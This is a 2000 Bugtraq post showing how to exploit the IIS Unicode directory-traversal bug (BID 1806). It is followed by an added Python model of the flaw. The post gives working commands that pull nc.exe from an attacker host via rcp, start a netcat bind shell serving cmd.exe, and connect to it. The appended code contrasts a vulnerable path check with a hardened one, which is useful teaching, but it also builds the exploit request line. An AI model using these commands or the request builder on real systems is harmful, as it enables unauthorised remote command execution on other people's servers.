[17336] in bugtraq


IIS Unicode

daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Wed Oct 25 03:45:48 2000

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.BSF.4.21.0010250230530.1398-100000@wips.sensepost.com>
Date:         Wed, 25 Oct 2000 02:54:58 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on Security Focus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools on the victim, you would probably want to have the
victim FTP to the attacker. The problem without a redirect is that you cannot
build the FTP command file, and you are a bit stuck.

A workaround (example) (with rsh running on the attacker's host and the necessary
config in .rhosts):

> perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe'
> perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe'
> telnet 160.124.19.101 8888
Trying 160.124.19.101...
Connected to clickfeed.
Escape character is '^]'.
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>

Of course you need to allow port 514 to the inside of your net etc.

;)
Have fun,
Roelof.

PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl

------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com		
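The post takes the IIS Unicode bug (Bugtraq ID 1806, MS00-078) as given and only shows how to use it. The following is an added Python model of that bug, written for this page; it is not code from the post, from unicodexecute.pl, or from Microsoft. It shows why `..%c0%af..` walks out of the web root: `%c0%af` is the overlong two-byte UTF-8 form of `/`, the traversal check runs on the still-encoded path and sees one odd directory name, and only afterwards does a lenient decoder turn it into `../..`. The hardened version decodes strictly first (Python's decoder rejects overlong forms) and checks the path the filesystem will actually see. The `/scripts` and `/winnt/system32` layout, the depth-two traversal, and the request shape are assumptions about a typical IIS 4/5 install, chosen to match the commands in the post.

```python
"""Model of the IIS Unicode (overlong UTF-8) traversal, BID 1806 / MS00-078.

Added illustration, not code from the post or from unicodexecute.pl. Paths
(/scripts, /winnt/system32) are the usual IIS 4/5 layout and are assumptions.
"""
import re
import urllib.parse

OVERLONG_SLASH = "%c0%af"   # overlong two-byte UTF-8 encoding of '/' (U+002F)


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 without rejecting overlong sequences (the flaw modelled here).
    Only 1- and 2-byte forms are handled, which is all the example needs."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and data[i + 1] & 0xC0 == 0x80:
            # No check that the value really needed two bytes: C0 AF -> 0x2F ('/')
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")   # anything else: replacement char, keep going
            i += 1
    return "".join(out)


def strict_utf8_decode(data: bytes):
    """Python's decoder rejects overlong forms; None signals an invalid request."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def escapes_webroot(path: str) -> bool:
    """Traversal check: does '..' ever climb above the web root?
    It checks whatever string it is given; the ordering bug is in the caller."""
    depth = 0
    for comp in re.split(r"[/\\]", path):
        if comp == "..":
            depth -= 1
            if depth < 0:
                return True
        elif comp not in ("", "."):
            depth += 1
    return False


def vulnerable_resolve(url_path: str):
    """Check first, decode second: the order that made BID 1806 exploitable.
    A plain '../' is caught; '..%c0%af..' looks like one directory name."""
    if escapes_webroot(url_path):
        return None
    return lenient_utf8_decode(urllib.parse.unquote_to_bytes(url_path))


def hardened_resolve(url_path: str):
    """Decode strictly first, then check the path the filesystem will see."""
    decoded = strict_utf8_decode(urllib.parse.unquote_to_bytes(url_path))
    if decoded is None or escapes_webroot(decoded):
        return None
    return decoded


def build_unicode_request(command: str, vhost: str = "160.124.19.101") -> str:
    """Request line in the shape the post's unicodexecute.pl-style tools send:
    climb two levels from /scripts, then run cmd.exe /c <command>.
    (Assumed layout; the traversal depth depends on where the vdir lives.)"""
    path = f"/scripts/..{OVERLONG_SLASH}../winnt/system32/cmd.exe"
    query = "/c+" + urllib.parse.quote_plus(command, safe="/:\\")
    return f"GET {path}?{query} HTTP/1.0\r\nHost: {vhost}\r\n\r\n"


if __name__ == "__main__":
    raw = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("check on encoded path escapes root:", escapes_webroot(raw))
    print("vulnerable server resolves to:", vulnerable_resolve(raw))
    print("hardened server resolves to:", hardened_resolve(raw))
    print(build_unicode_request("rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe"))
```

The point to take from the model is the ordering: any canonicalisation (percent-decoding, UTF-8 decoding, `..` collapsing) that happens after the authorisation check gives the attacker a second path string the check never saw. The `>` problem in the post is unrelated to this decoding step; the request builder above simply percent-encodes whatever command it is given and makes no claim that a redirect in the query string will be honoured by cmd.exe.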
